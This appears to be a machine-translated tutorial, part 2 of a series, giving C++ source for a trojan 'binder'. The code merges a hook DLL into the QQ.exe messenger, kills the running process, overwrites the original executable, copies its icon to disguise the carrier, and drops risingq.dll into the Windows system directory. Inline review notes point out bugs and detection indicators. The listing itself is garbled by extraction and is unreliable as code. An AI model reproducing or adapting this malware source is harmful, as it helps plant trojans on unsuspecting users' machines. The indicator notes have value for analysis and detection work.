QQ Trojan-file binding by yourself (Part 2)

Source: Internet
Author: User
Tags readfile


The Code is as follows:
// Determine whether to continue executing the file based on the returned value
// Entry point of the binder state machine. It compares this executable's own
// size with two known stub sizes (lenOrigin, lenOriginAddDll) to work out which
// stage it is in - bare stub, stub already carrying the DLL, or a fully bound
// carrier - and acts accordingly. Returns true only on the QQ.EXE branch after
// the payload has been split out and run; every other path returns false.
// hFileMyself, lenOrigin, lenOriginAddDll, my_name, szFlag, buf/BUF_SIZE,
// m_Ext and the str* paths are members or globals defined outside this listing.
// NOTE(review): the listing is garbled by extraction (capitalised tokens, "="
// where "==" is meant, "//" where "\\" was) and is not compilable as shown;
// the comments below describe intent, not a working build.
Bool CBindFile: Initiate ()
{
Int I = 0, k = 0;
DWORD dwErrorCode = 0;
// Size of this executable, read through a handle opened elsewhere (hFileMyself).
DWORD dwFileLen = GetFileSize (hFileMyself, NULL );
// Add the final size of the bundle program to determine whether the file is bound or the execution file is decomposed.
// Stage 1: own size equals the bare stub size -> bundle the hook DLL into Server.exe.
If (dwFileLen = lenOrigin)
{
// Bind HOOK. dll (produces Server.exe next to this file)
StrToBindFilePath = "hook. dll ";
StrFinalFilePath = "Server.exe ";
Lstrcpy (m_Ext, "dll ");

If (Bind_File ())
{
// Bound successfully
MessageBox (NULL, "bound successfully! ", NULL, NULL );

}
Return false;
}
// Stage 2: own size equals stub+DLL size -> bind a target program into the carrier.
Else if (dwFileLen = lenOriginAddDll)
{
// Bind the target file
// The local file named "server.exe"
// Take 6 characters of this executable's own name starting at length-10
// (presumably the "SERVER" of "SERVER.exe" - confirm against my_name's format).
// NOTE(review): this `I` shadows the `I` declared at the top of the function.
Char szName [7] = {0 };
Int I = lstrlen (my_name)-10;
For (k = 0; k <6; k ++, I ++)
{
SzName [k] = my_name [I];
}
If (0! = Lstrcmp (szName, "SERVER "))
{
// Automatically bind qq.exe to obtain the installation path of QQ through the Registry
// NOTE(review): despite the comment above, no registry lookup happens here;
// the QQ install path is hard-coded, so the code only works for a default install.
StrToBindFilePath = "C: // Program Files // Tencent // QQ.exe ";
Lstrcpy (m_Ext, "exe ");
}
Else
{
// The dialog box appears, waiting for user input
SelectFileToBind dlg;
Int nRet =-1;
NRet = dlg. DoModal ();
If (nRet! = IDOK)
{
MessageBox (NULL, "None input to get bindfilename", NULL, NULL );
Return false;
}
Dlg. GetFilePath (strToBindFilePath );
If (strToBindFilePath. IsEmpty ())
{
MessageBox (NULL, "None input filename", NULL, NULL );
Return false;
}
// Get the file extension and set m_Ext
// Copies the last 3 characters of the chosen path verbatim (no dot check,
// no case normalisation), so later lstrcmp checks against "exe" are case-sensitive.
Int pt = strToBindFilePath. GetLength ()-3;
For (I = 0; I <3; I ++)
{
M_Ext [I] = strToBindFilePath. GetAt (pt );
Pt ++;
}
MessageBox (NULL, m_Ext, "PRINT", NULL );
}
// Intermediate output written by Bind_File; deleted again at the end of this branch.
StrFinalFilePath = "000000.exe ";
// First determine whether the target file has been bound
// Reads the last 4 bytes of the target and compares them with szFlag, the
// marker Bind_File appends after the payload. From a defender's view this
// 4-byte trailer (preceded by a DWORD length and a 3-byte extension, see
// Bind_File) is the static layout that distinguishes a bound carrier.
HANDLE hDestFile = NULL;
DWORD bytesin = 0;
HDestFile = CreateFile (strToBindFilePath, GENERIC_READ,
File_cmd_read, NULL, OPEN_EXISTING,
File_attribute_normal, null );
If (invalid_handle_value = hdestfile)
{
MessageBox (null, "failed to open this file when determining the target file! ", Null, null );
Return false;
}
Setfilepointer (hdestfile, getfilesize (hdestfile, null)-4, null, file_begin );
// NOTE(review): the early return below leaves hDestFile open (handle leak).
If (0 = readfile (hdestfile, Buf, buf_size, & bytesin, null ))
{
MessageBox (null, "An error occurred while reading the target file! ", Null, null );
Return false;
}
Closehandle (hdestfile );
If (4! = Bytesin)
{
MessageBox (NULL, "determines that the number of bytes read in the target file is not 4! ", NULL, NULL );
Return false;
}
// All four trailer bytes must match szFlag for the file to count as already bound.
For (I = 0; I <4; I ++)
{
If (buf [I]! = SzFlag [I])
{
Break;
} Else if (3 = I)
{
// If it has been bound, return
MessageBox (NULL, "the target file has been bound! ", NULL, NULL );
Return false;
}
}
// Start binding if you confirm that you have not been bound
// NOTE(review): Bind_File's return value is ignored, so the destructive steps
// below (DeleteFile/CopyFile over the original) run even if binding failed.
Bind_File ();
// If the bound file is not an EXE file, change it to an EXE file.
// The original target is deleted and the carrier takes its base name with ".exe".
If (0! = Lstrcmp (m_Ext, "exe "))
{
DeleteFile (strToBindFilePath );
// Modify the file extension
CString strToBindFilePath1;
StrToBindFilePath1 = strToBindFilePath. Left (strToBindFilePath. GetLength ()-3 );
StrToBindFilePath1 + = "exe ";
StrToBindFilePath. Empty ();
StrToBindFilePath = strToBindFilePath1;
}
// Replace the original target executable with the merged carrier.
BOOL bResult;
BResult = CopyFile (strFinalFilePath, strToBindFilePath, false );
DwErrorCode = GetLastError ();
// 32 == ERROR_SHARING_VIOLATION: the target is in use (e.g. QQ is running).
If (32 = dwErrorCode)
{
// Other processes are using this file to end the process
// The process holding the file is terminated by image name and the copy is
// retried. Behaviourally this is the most visible host indicator in the
// function: a process terminating a running application and then overwriting
// its executable in Program Files.
TCHAR szFileName_Exe [MAX_PATH];
StrToBindFilePath. MakeUpper ();
Lstrcpy (szFileName_Exe, (LPCTSTR) strToBindFilePath );
If (TRUE = CloseProcessFromName (szFileName_Exe ))
{
BResult = CopyFile (strFinalFilePath, strToBindFilePath, false );
DwErrorCode = GetLastError ();
CString str;
// NOTE(review): `dwError` is not declared in this function; the variable
// read on the lines above is `dwErrorCode`.
Str. Format ("% d CopyFiles Error code % d", bResult, dwError );
MessageBox (NULL, str, NULL, NULL );
}
}
// Remove the intermediate 000000.exe.
DeleteFile (strFinalFilePath );
Return false;
}
// Stage 3: any other size means this process *is* the bound carrier.
Else
{
// Determine whether the target file needs to be hooked
// IsSpecFileName (not shown) presumably tests this executable's own name.
If (IsSpecFileName ("QQ. EXE "))
{
// Break down HOOK. dll and target file
// The DLL destination is the Windows system directory under the name
// risingq.dll; Unbind_and_Run (not shown) presumably writes it there and
// launches the unpacked original. A DLL appearing in the system directory
// from a user-launched application process is the clearest file-system
// indicator for this stage. The "//" is most likely an extraction artefact
// for a "\\" path separator.
TCHAR szSysPath [MAX_PATH];
: GetSystemDirectory (szSysPath, MAX_PATH );
StrUnbindFilePath_Dll = szSysPath;
StrUnbindFilePath_Dll + = "// risingq. dll ";
MessageBox (NULL, strUnbindFilePath_Dll, "PRINT", NULL );
Unbind_and_Run ();
Return true;
}
Else
{
// If this program is not a target HOOK file, it will be decomposed into an original file SERVER for running.
MessageBox (NULL, "running is not the target file", NULL, NULL );
CloneMySelf_and_Run ();
Return false;
}
}
}
2. Bind_File ()
// Bind the specified file to generate a merged File
// Writes strFinalFilePath as a carrier with the layout:
//   [this executable's own image, MODIFY_DATA record patched with its length]
//   [DWORD length of the bound file] [3-byte extension]
//   [bound file bytes] [szFlag marker - only when the bound file is not a DLL]
// Returns true on success, false after a MessageBox on any failure.
// hFileMyself, modify_data, m_Ext, strFinalFilePath, strToBindFilePath,
// Buf/BUF_SIZE and szFlag are members or globals defined outside this listing.
// NOTE(review): the listing is garbled by extraction (capitalised tokens, "="
// where "==" is meant) and is not compilable as shown.
Bool CBindFile: Bind_File ()
{
HANDLE hFileOut = NULL; // final file Merging
HANDLE hFileIn = NULL; // file to be bound
DWORD dwFileInLen = 0; // length of the file to be bound
DWORD bytesin = 0; // number of bytes entered at a time
DWORD bytesout = 0; // number of bytes output at a time
Unsigned int I = 0, k = 0;
Byte * bufmyself = NULL;
 
// Record this executable's own size in the record that is patched into the image below.
Modify_data.my_length = getfilesize (hfilemyself, null );
If (0 = modify_data.my_length)
{
MessageBox (null, "An error occurred while binding the file itself to zero length! "," Error ", mb_ OK );
Return false;
}
// NOTE(review): on a conforming C++ runtime new[] throws std::bad_alloc rather
// than returning null; this null check only has effect with older runtimes or
// nothrow new.
Bufmyself = new byte [modify_data.my_length];
If (null = bufmyself)
{
MessageBox (null, "failed to allocate memory in file binding! ", Null, null );
Return false;
}
ZeroMemory (bufMyself, modify_data.my_length );
SetFilePointer (hFileMyself, 0, NULL, FILE_BEGIN );
// Read the data of this file
If (0 = ReadFile (hFileMyself, bufMyself, modify_data.my_length, & bytesin, NULL ))
{
Delete [] bufMyself;
MessageBox (NULL, "An error occurred while binding the file. The file cannot be completely read! "," Error ", MB_ OK );
Return false;
}
// When bundling the DLL stage, scan the in-memory copy of this executable for
// the `finder` constant and overwrite the whole MODIFY_DATA record at that
// offset, so the written copy carries its own length. Only offsets that are a
// multiple of sizeof(finder) are examined, and the first match wins - the
// article itself notes that a colliding constant elsewhere would be patched.
If (0 = lstrcmp (m_Ext, "dll") // locate the file size when you bind the DLL.
{
For (I = 0; I <modify_data.my_length-sizeof (modify_data.finder );
I + = sizeof (modify_data.finder ))
{
For (k = 0; k <sizeof (modify_data.finder); k ++)
{
If (bufMyself [I + k]! = (BYTE *) & modify_data.finder) [k])
Break;
}
If (k = sizeof (modify_data.finder) // locate and save the size of your data file
{
Memcpy (bufMyself + I, & modify_data, sizeof (modify_data ));
Break;
}
}
If (I> = modify_data.my_length-sizeof (modify_data.finder ))
{
Delete [] bufMyself;
MessageBox (null, "An error occurred while binding the file. The file cannot be located! "," Error ", mb_ OK );
Return false;
}
}
// If a PE file is bound, copy the icon of the PE file to the final merged file.
// Modify_myicon (not shown) presumably patches the icon resource in the buffer
// so the carrier looks like the target it replaces.
If (0 = lstrcmp (m_ext, "EXE "))
{
Modify_myicon (bufmyself );
}

// Create the final merged File
Hfileout = createfile (strfinalfilepath, generic_write,
File_pai_read, null, open_always,
File_attribute_normal, null );
If (invalid_handle_value = hfileout)
{
Delete [] bufmyself;
MessageBox (NULL, "in the binding file, an error occurred while creating the merged file generated after the binding! "," Error ", MB_ OK );
Return false;
}
// Write the data of this file to the output file
// Writes `bytesin` (what ReadFile returned), not my_length; the return value is unchecked.
WriteFile (hFileOut, bufMyself, bytesin, & bytesout, NULL );
// Release the large memory that stores the file data, and use buf as the buffer later
Delete [] bufMyself;

// Open the file to be bound
HFileIn = CreateFile (strToBindFilePath, GENERIC_READ,
File_cmd_read, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL );
// NOTE(review): this early return leaves hFileOut open (handle leak).
If (INVALID_HANDLE_VALUE = hFileIn)
{
MessageBox (NULL, "An error occurred while opening the first file to be bound in the bound file! "," Error ", MB_ OK );
Return false;
}
// Obtain the length of the file to be bound
DwFileInLen = GetFileSize (hFileIn, NULL );
If (0 = dwFileInLen)
{
CloseHandle (hFileIn );
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while reading the file to be bound in the bound file! "," Error ", MB_ OK );
Return false;
}
// Write the length of the file to be bound to the merged File
// These two fields (DWORD length, then 3 extension bytes) are the header the
// unpacker (not shown) presumably uses to split the payload back out.
WriteFile (hFileOut, & dwFileInLen, sizeof (dwFileInLen), & bytesout, NULL );
// Write the extension of the final decomposed File
WriteFile (hFileOut, m_Ext, 3, & bytesout, NULL );
// Read data from the file to be bound and write it to the output file
// Streams the target through Buf in BUF_SIZE chunks until ReadFile returns 0 bytes.
Do
{
If (0 = readfile (hfilein, Buf, buf_size, & bytesin, null ))
{
Closehandle (hfilein );
Closehandle (hfileout );
MessageBox (null, "file binding in progress, read the file to be bound size does not match! ", Null, null );
Return false;
}
Writefile (hfileout, Buf, bytesin, & bytesout, null );
} While (0! = Bytesin );
 
// Append the "already bound" marker for non-DLL targets. Initiate reads the
// last 4 bytes of a file and compares them with szFlag, so szFlag is presumably
// 4 characters long - confirm against its definition.
If (0! = Lstrcmp (m_ext, "DLL "))
{
// Mark that the file has been bound when binding a non-DLL file
// NOTE(review): the early return below leaves both handles open (handle leak).
If (0 = writefile (hfileout, szflag, lstrlen (szflag), & bytesout, null ))
{
MessageBox (null, "An error occurred while writing the bound flag in the bound file.", null, null );
Return false;
}
}
CloseHandle (hFileIn );
CloseHandle (hFileOut );
Return true;
}
Here we mainly explain modify_data, a global variable of type MODIFY_DATA. Its definition is as follows:
// Self-description record that lives in the stub's .data section. Bind_File
// scans the stub's own image for the byte pattern of `finder` and overwrites
// the whole record, so the written copy carries its own size in my_length.
// Because `finder` is a fixed constant present in every build (0x78563412,
// stored little-endian on x86 as the bytes 12 34 56 78), it doubles as one
// static indicator a scanner can look for in carriers produced by this tool.
Struct MODIFY_DATA {
DWORD finder; // constant (locate itself) - must not occur elsewhere in the image
DWORD my_length; // file length (itself) - 0 in the source, patched at bind time
} Modify_data = {0x78563412, 0 };
Because the global variable is stored in the .data section of the PE file, you only need to open the file, search for the finder constant, and find the location where the variable is stored in the PE file.
Then the value of my_length is written at that location. Later, when the file runs, modify_data already holds the written size. Of course,
this method is risky, since more than one copy of the finder value may exist in the file.
